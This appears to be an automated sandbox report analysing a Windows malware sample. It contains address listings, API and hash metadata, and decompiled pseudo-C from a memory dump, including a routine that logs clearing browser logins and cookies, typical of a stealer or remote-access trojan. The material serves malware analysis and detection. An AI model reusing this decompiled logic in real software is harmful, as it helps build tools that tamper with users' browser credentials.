                                                                                                0x0043fbd8
                                                                                                0x0043fc5f
                                                                                                0x0043fc5f
                                                                                                0x0043fbde
                                                                                                0x0043fbde
                                                                                                0x0043fbe0
                                                                                                0x0043fbe6
                                                                                                0x0043fbe9
                                                                                                0x0043fbec
                                                                                                0x0043fbf2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fbf4
                                                                                                0x0043fbf8
                                                                                                0x0043fc21
                                                                                                0x0043fc21
                                                                                                0x0043fc23
                                                                                                0x0043fbfa
                                                                                                0x0043fbfa
                                                                                                0x0043fbfe
                                                                                                0x0043fc02
                                                                                                0x0043fc09
                                                                                                0x0043fc0f
                                                                                                0x00000000
                                                                                                0x0043fc11
                                                                                                0x0043fc11
                                                                                                0x0043fc14
                                                                                                0x0043fc17
                                                                                                0x0043fc1f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fc1f
                                                                                                0x0043fc0f
                                                                                                0x0043fc2e
                                                                                                0x0043fc2e
                                                                                                0x0043fc30
                                                                                                0x0043fc5e
                                                                                                0x0043fc5e
                                                                                                0x00000000
                                                                                                0x0043fc32
                                                                                                0x0043fc32
                                                                                                0x0043fc38
                                                                                                0x0043fc39
                                                                                                0x0043fc3a
                                                                                                0x0043fc3b
                                                                                                0x0043fc40
                                                                                                0x0043fc46
                                                                                                0x0043fc49
                                                                                                0x0043fc4b
                                                                                                0x0043fc52
                                                                                                0x0043fc54
                                                                                                0x0043fc56
                                                                                                0x0043fc4d
                                                                                                0x0043fc4d
                                                                                                0x0043fc4e
                                                                                                0x00000000
                                                                                                0x0043fc4e
                                                                                                0x0043fc4b
                                                                                                0x00000000
                                                                                                0x0043fc30
                                                                                                0x0043fc27
                                                                                                0x0043fc29
                                                                                                0x0043fc2c
                                                                                                0x0043fc2c
                                                                                                0x00000000
                                                                                                0x0043fc2c
                                                                                                0x0043fc65
                                                                                                0x0043fc65
                                                                                                0x0043fc66
                                                                                                0x0043fc69
                                                                                                0x0043fc6f
                                                                                                0x0043fc6f
                                                                                                0x0043fc78
                                                                                                0x0043fc7a
                                                                                                0x00000000
                                                                                                0x0043fc7c
                                                                                                0x0043fc7c
                                                                                                0x00000000
                                                                                                0x0043fc7c
                                                                                                0x0043fc7a
                                                                                                0x00000000
                                                                                                0x0043fa41
                                                                                                0x0043fa41
                                                                                                0x0043fa46
                                                                                                0x00000000
                                                                                                0x0043fa4c
                                                                                                0x0043fa4c
                                                                                                0x0043fa51
                                                                                                0x00000000
                                                                                                0x0043fa57
                                                                                                0x0043fa57
                                                                                                0x0043fa5d
                                                                                                0x0043fa62
                                                                                                0x0043fa64
                                                                                                0x0043fa6b
                                                                                                0x0043fa6c
                                                                                                0x0043fa6e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fa74
                                                                                                0x0043fa74
                                                                                                0x0043fa78
                                                                                                0x0043fa7e
                                                                                                0x00000000
                                                                                                0x0043fa84
                                                                                                0x0043fa86
                                                                                                0x0043fa87
                                                                                                0x0043fa8a
                                                                                                0x00000000
                                                                                                0x0043fa90
                                                                                                0x0043fa90
                                                                                                0x0043fa96
                                                                                                0x0043fa9b
                                                                                                0x0043faa5
                                                                                                0x0043faa9
                                                                                                0x0043faae
                                                                                                0x0043fab1
                                                                                                0x0043fab3
                                                                                                0x00000000
                                                                                                0x0043fab5
                                                                                                0x0043fab5
                                                                                                0x0043fab7
                                                                                                0x0043faba
                                                                                                0x0043faba
                                                                                                0x0043fabd
                                                                                                0x0043fac0
                                                                                                0x0043fac0
                                                                                                0x0043facb
                                                                                                0x0043facd
                                                                                                0x0043facf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043facf
                                                                                                0x00000000
                                                                                                0x0043fad1
                                                                                                0x0043fad1
                                                                                                0x0043fad7
                                                                                                0x0043fada
                                                                                                0x0043fada
                                                                                                0x0043fae8
                                                                                                0x0043faf1
                                                                                                0x0043faf6
                                                                                                0x0043fafc
                                                                                                0x0043faff
                                                                                                0x0043fb00
                                                                                                0x0043fb02
                                                                                                0x0043fb10
                                                                                                0x0043fb10
                                                                                                0x0043fb17
                                                                                                0x0043fb78
                                                                                                0x00000000
                                                                                                0x0043fb19
                                                                                                0x0043fb19
                                                                                                0x0043fb27
                                                                                                0x0043fb2c
                                                                                                0x0043fb2f
                                                                                                0x0043fb31
                                                                                                0x0043fca1
                                                                                                0x0043fca3
                                                                                                0x0043fca4
                                                                                                0x0043fca5
                                                                                                0x0043fca6
                                                                                                0x0043fca7
                                                                                                0x0043fca8
                                                                                                0x0043fcad
                                                                                                0x0043fcb0
                                                                                                0x0043fcb1
                                                                                                0x0043fcb9
                                                                                                0x0043fcc0
                                                                                                0x0043fcc3
                                                                                                0x0043fcc4
                                                                                                0x0043fcc7
                                                                                                0x0043fccb
                                                                                                0x0043fccc
                                                                                                0x0043fccf
                                                                                                0x0043fcdf
                                                                                                0x0043fceb
                                                                                                0x0043fd02
                                                                                                0x0043fd07
                                                                                                0x0043fd0a
                                                                                                0x0043fd0c
                                                                                                0x0043fd21
                                                                                                0x0043fd24
                                                                                                0x0043fd24
                                                                                                0x0043fd27
                                                                                                0x0043fd2d
                                                                                                0x0043fd36
                                                                                                0x0043fd38
                                                                                                0x0043fd3b
                                                                                                0x0043fd42
                                                                                                0x0043fd45
                                                                                                0x0043fd4b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fd4d
                                                                                                0x0043fd51
                                                                                                0x0043fd7a
                                                                                                0x0043fd7a
                                                                                                0x0043fd53
                                                                                                0x0043fd53
                                                                                                0x0043fd57
                                                                                                0x0043fd5b
                                                                                                0x0043fd62
                                                                                                0x0043fd68
                                                                                                0x00000000
                                                                                                0x0043fd6a
                                                                                                0x0043fd6a
                                                                                                0x0043fd6d
                                                                                                0x0043fd70
                                                                                                0x0043fd78
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fd78
                                                                                                0x0043fd68
                                                                                                0x0043fd87
                                                                                                0x0043fd87
                                                                                                0x0043fd89
                                                                                                0x0043fd8f
                                                                                                0x0043fd95
                                                                                                0x0043fd98
                                                                                                0x0043fd98
                                                                                                0x0043fd9b
                                                                                                0x0043fd9e
                                                                                                0x0043fd9e
                                                                                                0x0043fdae
                                                                                                0x0043fdbc
                                                                                                0x0043fdc1
                                                                                                0x0043fdc8
                                                                                                0x0043fdca
                                                                                                0x00000000
                                                                                                0x0043fdd0
                                                                                                0x0043fdd6
                                                                                                0x0043fddc
                                                                                                0x0043fde3
                                                                                                0x0043fde9
                                                                                                0x0043fdec
                                                                                                0x0043fdf2
                                                                                                0x0043fdff
                                                                                                0x0043fe06
                                                                                                0x0043fe0b
                                                                                                0x0043fe0e
                                                                                                0x0043fe10
                                                                                                0x00440069
                                                                                                0x0044006f
                                                                                                0x00440070
                                                                                                0x00440071
                                                                                                0x00440072
                                                                                                0x00440073
                                                                                                0x00440074
                                                                                                0x00440079
                                                                                                0x0044007a
                                                                                                0x0044007f
                                                                                                0x0043fe16
                                                                                                0x0043fe16
                                                                                                0x0043fe24
                                                                                                0x0043fe27
                                                                                                0x0043fe42
                                                                                                0x0043fe49
                                                                                                0x0043fe4f
                                                                                                0x0043fe55
                                                                                                0x0043fe29
                                                                                                0x0043fe29
                                                                                                0x0043fe31
                                                                                                0x00000000
                                                                                                0x0043fe33
                                                                                                0x0043fe33
                                                                                                0x0043fe39
                                                                                                0x0043fe39
                                                                                                0x0043fe31
                                                                                                0x0043fe5c
                                                                                                0x0043fe5f
                                                                                                0x0043ff7c
                                                                                                0x0043ff7f
                                                                                                0x0043ff8c
                                                                                                0x0043ff8f
                                                                                                0x0043ff97
                                                                                                0x0043ff97
                                                                                                0x0043ff81
                                                                                                0x0043ff87
                                                                                                0x0043ff87
                                                                                                0x0043fe65
                                                                                                0x0043fe65
                                                                                                0x0043fe6b
                                                                                                0x0043fe73
                                                                                                0x0043fe75
                                                                                                0x0043fe78
                                                                                                0x0043fe81
                                                                                                0x0043fe8a
                                                                                                0x0043fe90
                                                                                                0x0043fe90
                                                                                                0x0043fe93
                                                                                                0x0043fe95
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fe97
                                                                                                0x0043fe9d
                                                                                                0x0043fe9e
                                                                                                0x0043fea9
                                                                                                0x0043feb1
                                                                                                0x0043feb9
                                                                                                0x0043febc
                                                                                                0x0043febf
                                                                                                0x0043fec5
                                                                                                0x0043fecb
                                                                                                0x0043fed1
                                                                                                0x0043fed7
                                                                                                0x0043feda
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fedc
                                                                                                0x0043ff01
                                                                                                0x0043ff01
                                                                                                0x0043ff04
                                                                                                0x0043ff08
                                                                                                0x0043ff21
                                                                                                0x0043ff26
                                                                                                0x0043ff29
                                                                                                0x0043ff2b
                                                                                                0x0043ff31
                                                                                                0x0043ff6c
                                                                                                0x0043ff33
                                                                                                0x0043ff33
                                                                                                0x0043ff38
                                                                                                0x0043ff40
                                                                                                0x0043ff41
                                                                                                0x0043ff41
                                                                                                0x0043ff58
                                                                                                0x0043ff5f
                                                                                                0x0043ff62
                                                                                                0x0043ff67
                                                                                                0x0043ff67
                                                                                                0x0043ff6f
                                                                                                0x0043ff72
                                                                                                0x0043ff72
                                                                                                0x0043ff77
                                                                                                0x00000000
                                                                                                0x0043ff77
                                                                                                0x0043fede
                                                                                                0x0043fee0
                                                                                                0x0043fee5
                                                                                                0x0043feeb
                                                                                                0x0043fef4
                                                                                                0x0043fefd
                                                                                                0x0043fefd
                                                                                                0x00000000
                                                                                                0x0043fee0
                                                                                                0x0043ff9a
                                                                                                0x0043ff9a
                                                                                                0x0043ff9e
                                                                                                0x0043ffa6
                                                                                                0x0043ffac
                                                                                                0x0043ffaf
                                                                                                0x0043ffb5
                                                                                                0x0043ffb7
                                                                                                0x0043fff7
                                                                                                0x0043fffd
                                                                                                0x00440004
                                                                                                0x00440004
                                                                                                0x0044000a
                                                                                                0x0044000e
                                                                                                0x00000000
                                                                                                0x00440010
                                                                                                0x00440010
                                                                                                0x00440014
                                                                                                0x00440019
                                                                                                0x0044001d
                                                                                                0x00440022
                                                                                                0x00440029
                                                                                                0x00440037
                                                                                                0x0044003d
                                                                                                0x00440040
                                                                                                0x00440040
                                                                                                0x0044000e
                                                                                                0x0044004f
                                                                                                0x00440057
                                                                                                0x00440060
                                                                                                0x0043ffb9
                                                                                                0x0043ffbf
                                                                                                0x0043ffc2
                                                                                                0x0043ffc9
                                                                                                0x0043ffdb
                                                                                                0x0043ffe2
                                                                                                0x0043ffef
                                                                                                0x00000000
                                                                                                0x0043ffef
                                                                                                0x00000000
                                                                                                0x0043ffb7
                                                                                                0x0043fe10
                                                                                                0x0043fd8b
                                                                                                0x00000000
                                                                                                0x0043fd8b
                                                                                                0x00000000
                                                                                                0x0043fd89
                                                                                                0x0043fd82
                                                                                                0x0043fd84
                                                                                                0x0043fd84
                                                                                                0x00000000
                                                                                                0x0043fd0e
                                                                                                0x0043fd0e
                                                                                                0x0043fd0e
                                                                                                0x0043fd10
                                                                                                0x0043fd15
                                                                                                0x0043fd20
                                                                                                0x0043fd20
                                                                                                0x0043fb37
                                                                                                0x0043fb37
                                                                                                0x0043fb3a
                                                                                                0x0043fb3f
                                                                                                0x0043fc9c
                                                                                                0x00000000
                                                                                                0x0043fb45
                                                                                                0x0043fb47
                                                                                                0x0043fb4f
                                                                                                0x0043fb55
                                                                                                0x0043fb56
                                                                                                0x0043fb5c
                                                                                                0x0043fb5d
                                                                                                0x0043fb62
                                                                                                0x0043fb65
                                                                                                0x0043fb67
                                                                                                0x0043fb6d
                                                                                                0x0043fb6f
                                                                                                0x0043fb70
                                                                                                0x0043fb70
                                                                                                0x0043fb7e
                                                                                                0x0043fb7e
                                                                                                0x0043fb81
                                                                                                0x0043fb83
                                                                                                0x0043fb86
                                                                                                0x0043fb94
                                                                                                0x0043fb94
                                                                                                0x0043fc7e
                                                                                                0x0043fc7e
                                                                                                0x00000000
                                                                                                0x0043fc80
                                                                                                0x0043fc80
                                                                                                0x00000000
                                                                                                0x0043fb88
                                                                                                0x0043fb88
                                                                                                0x0043fb8b
                                                                                                0x0043fb8e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fb8e
                                                                                                0x0043fb86
                                                                                                0x0043fb3f
                                                                                                0x0043fb31
                                                                                                0x0043fb04
                                                                                                0x0043fb06
                                                                                                0x0043fb07
                                                                                                0x0043fb0a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fb0a
                                                                                                0x0043fb02
                                                                                                0x0043fa8a
                                                                                                0x00000000
                                                                                                0x0043fa7e
                                                                                                0x00000000
                                                                                                0x0043fb9b
                                                                                                0x0043fa51
                                                                                                0x0043fa46
                                                                                                0x0043fa3b
                                                                                                0x0043f9f4
                                                                                                0x0043f9f4
                                                                                                0x0043f9f6
                                                                                                0x0043f9f8
                                                                                                0x0043f9f9
                                                                                                0x0043f9fa
                                                                                                0x0043f9fb
                                                                                                0x0043fa00
                                                                                                0x0043fc8b
                                                                                                0x0043fc90
                                                                                                0x0043fc9b
                                                                                                0x0043fc9b
                                                                                                0x0043f9f2
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                • _free.LIBCMT ref: 0043F93B
                                                                                                • _free.LIBCMT ref: 0043F952
                                                                                                • _free.LIBCMT ref: 0043F971
                                                                                                • _free.LIBCMT ref: 0043F98C
                                                                                                • _free.LIBCMT ref: 0043F9A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3033488037-0
                                                                                                • Opcode ID: 8fee0f539c6b4ec05e4bde5980b4adcfdb9fc21a50c2bde062df2c03e1249692
                                                                                                • Instruction ID: 6aaaa5bec138e3d3e81223152904448ce55a974662f590fac9bc0c466bee7041
                                                                                                • Opcode Fuzzy Hash: 8fee0f539c6b4ec05e4bde5980b4adcfdb9fc21a50c2bde062df2c03e1249692
                                                                                                • Instruction Fuzzy Hash: 9B51D471E00304AFEB24EF6AC841B6A77F4EF58724F10556EE849DB250EB39ED058B48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043E92E, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E0043E92E(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46c00c; // 0x4cc22724
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0043EC2D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0042FDF1(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0042FDF1(_t78 + 4);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0042FDF1(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00448FA5(_t56);
						_t40 = E004414D5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00448FA5(_t56);
						E004414D5(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46c00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                                                                                0x0043e92e
                                                                                                0x0043e938
                                                                                                0x0043e93c
                                                                                                0x0043e93e
                                                                                                0x0043e942
                                                                                                0x0043e94c
                                                                                                0x0043e95d
                                                                                                0x0043e962
                                                                                                0x0043e964
                                                                                                0x0043e966
                                                                                                0x0043e968
                                                                                                0x0043e96a
                                                                                                0x0043e96e
                                                                                                0x0043ea28
                                                                                                0x0043ea36
                                                                                                0x0043ea38
                                                                                                0x0043ea3d
                                                                                                0x0043ea44
                                                                                                0x0043ea54
                                                                                                0x0043ea63
                                                                                                0x0043ea66
                                                                                                0x0043ea68
                                                                                                0x00000000
                                                                                                0x0043ea69
                                                                                                0x0043e976
                                                                                                0x0043e97b
                                                                                                0x0043e980
                                                                                                0x0043e982
                                                                                                0x0043e982
                                                                                                0x0043e984
                                                                                                0x0043e989
                                                                                                0x0043e98d
                                                                                                0x0043e98d
                                                                                                0x0043e990
                                                                                                0x0043e9af
                                                                                                0x0043e9af
                                                                                                0x0043e9b1
                                                                                                0x0043e9b4
                                                                                                0x0043e9bd
                                                                                                0x0043e9c0
                                                                                                0x0043e9c5
                                                                                                0x0043e9c8
                                                                                                0x0043e9cd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043e9cf
                                                                                                0x00000000
                                                                                                0x0043e992
                                                                                                0x0043e992
                                                                                                0x0043e994
                                                                                                0x0043e99d
                                                                                                0x0043e9a0
                                                                                                0x0043e9a5
                                                                                                0x0043e9a8
                                                                                                0x0043e9ad
                                                                                                0x0043e9d7
                                                                                                0x0043e9da
                                                                                                0x0043e9dc
                                                                                                0x0043e9df
                                                                                                0x0043e9e7
                                                                                                0x0043e9ed
                                                                                                0x0043e9f4
                                                                                                0x0043e9f6
                                                                                                0x0043e9fe
                                                                                                0x0043ea0d
                                                                                                0x0043ea11
                                                                                                0x0043ea13
                                                                                                0x0043ea16
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043ea18
                                                                                                0x0043ea1b
                                                                                                0x0043ea1d
                                                                                                0x0043ea1d
                                                                                                0x0043ea1e
                                                                                                0x0043ea20
                                                                                                0x0043ea23
                                                                                                0x00000000
                                                                                                0x0043ea1d
                                                                                                0x00000000
                                                                                                0x0043e9ad
                                                                                                0x0043e990
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: b0c3631190825fb247436dd3047d6e30e75d60bdc86dd48adbe74bfa38bba167
                                                                                                • Instruction ID: 18cd1fd9d550af13f9bd9250775877e2e2697c8ddc90931c32446df81c8b808c
                                                                                                • Opcode Fuzzy Hash: b0c3631190825fb247436dd3047d6e30e75d60bdc86dd48adbe74bfa38bba167
                                                                                                • Instruction Fuzzy Hash: BC41E472B01204DFDB10DF79C880A6EB7B6EF88314F1545AEE515EB391DA35AD01CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044A5FC, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 81%
                                                                                                			E0044A5FC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x46c00c; // 0x4cc22724
				_v8 = _t34 ^ _t70;
				E00436267(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00430A5B(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00432D80(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E004318FD(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00440C6C(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004519B0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                                                                                                0x0044a604
                                                                                                0x0044a60b
                                                                                                0x0044a617
                                                                                                0x0044a61c
                                                                                                0x0044a621
                                                                                                0x0044a626
                                                                                                0x0044a629
                                                                                                0x0044a62b
                                                                                                0x0044a62b
                                                                                                0x0044a630
                                                                                                0x0044a649
                                                                                                0x0044a64f
                                                                                                0x0044a654
                                                                                                0x0044a6f3
                                                                                                0x0044a6f7
                                                                                                0x0044a6fc
                                                                                                0x0044a6fc
                                                                                                0x0044a718
                                                                                                0x0044a718
                                                                                                0x0044a65a
                                                                                                0x0044a662
                                                                                                0x0044a666
                                                                                                0x0044a6b2
                                                                                                0x0044a6b4
                                                                                                0x0044a6b6
                                                                                                0x0044a6bb
                                                                                                0x0044a6d2
                                                                                                0x0044a6da
                                                                                                0x0044a6ea
                                                                                                0x0044a6ea
                                                                                                0x0044a6da
                                                                                                0x0044a6ec
                                                                                                0x0044a6ed
                                                                                                0x00000000
                                                                                                0x0044a6f2
                                                                                                0x0044a66d
                                                                                                0x0044a66f
                                                                                                0x0044a671
                                                                                                0x0044a679
                                                                                                0x0044a696
                                                                                                0x0044a6a0
                                                                                                0x0044a6a5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044a6a7
                                                                                                0x0044a6ad
                                                                                                0x0044a6ad
                                                                                                0x00000000
                                                                                                0x0044a6ad
                                                                                                0x0044a67d
                                                                                                0x0044a681
                                                                                                0x0044a686
                                                                                                0x0044a68a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044a68c
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00437B61,?,00000000,?,00000001,?,?,00000001,00437B61,?), ref: 0044A649
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044A681
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044A6D2
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004368BC,?), ref: 0044A6E4
                                                                                                • __freea.LIBCMT ref: 0044A6ED
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                • String ID:
                                                                                                • API String ID: 313313983-0
                                                                                                • Opcode ID: 7e79db97571175ca7111f874d4c38dfa999d1bf06c5dd09b332ed8df72992552
                                                                                                • Instruction ID: e3019f22f7cfd39f5529fa93d9ebec7d24df21dc7c365d8cb9bf80db1de2f609
                                                                                                • Opcode Fuzzy Hash: 7e79db97571175ca7111f874d4c38dfa999d1bf06c5dd09b332ed8df72992552
                                                                                                • Instruction Fuzzy Hash: 32311472A0021AABEF249F65DC85DAF7BA4EF40314F09416AFC04DB250E739CC60CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040A558, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 83%
                                                                                                			E0040A558(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t55;

				_t52 = __edi;
				_t54 = _t53 & 0xfffffff8;
				 *0x46daed = 1;
				Sleep( *0x46dae8);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t59 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0040A43E(_t59);
						}
						_t60 = _t36;
						if(_t36 == 0) {
							_t36 = E0040A262(_t52, _t60);
						}
						_t61 = _v6;
						if(_v6 == 0) {
							_v6 = E0040A047(_t36, _t52, _t61);
						}
						_t62 = _v7;
						if(_v7 == 0) {
							_v7 = E00409FB8(_t52, _t62);
						}
						_t50 = _v5;
						_t63 = _t50;
						if(_t50 == 0) {
							_t50 = E00409F29(_t52, _t63);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t73 = _t40;
				} while (_t40 == 0);
				_t55 = _t54 - 0x18;
				E00402076(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
				E0040A724(_t36, _t50, _t73);
				E00402076(_t36, _t55, "Cleared browsers logins and cookies.");
				_t56 = _t55 - 0x18;
				E00402076(_t36, _t55 - 0x18, "i");
				E00417670(_t36, _t52);
				E00402076(_t36, _t56 + 0x18, 0x460734);
				_push(0xaf);
				E00404BB7(_t36, 0x46e848, _t50, _t73);
				if( *0x46daec != 0) {
					E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "FR", 1);
				}
				 *0x46daed = 0;
				return 0;
			}

















                                                                                                0x0040a558
                                                                                                0x0040a55b
                                                                                                0x0040a566
                                                                                                0x0040a56d
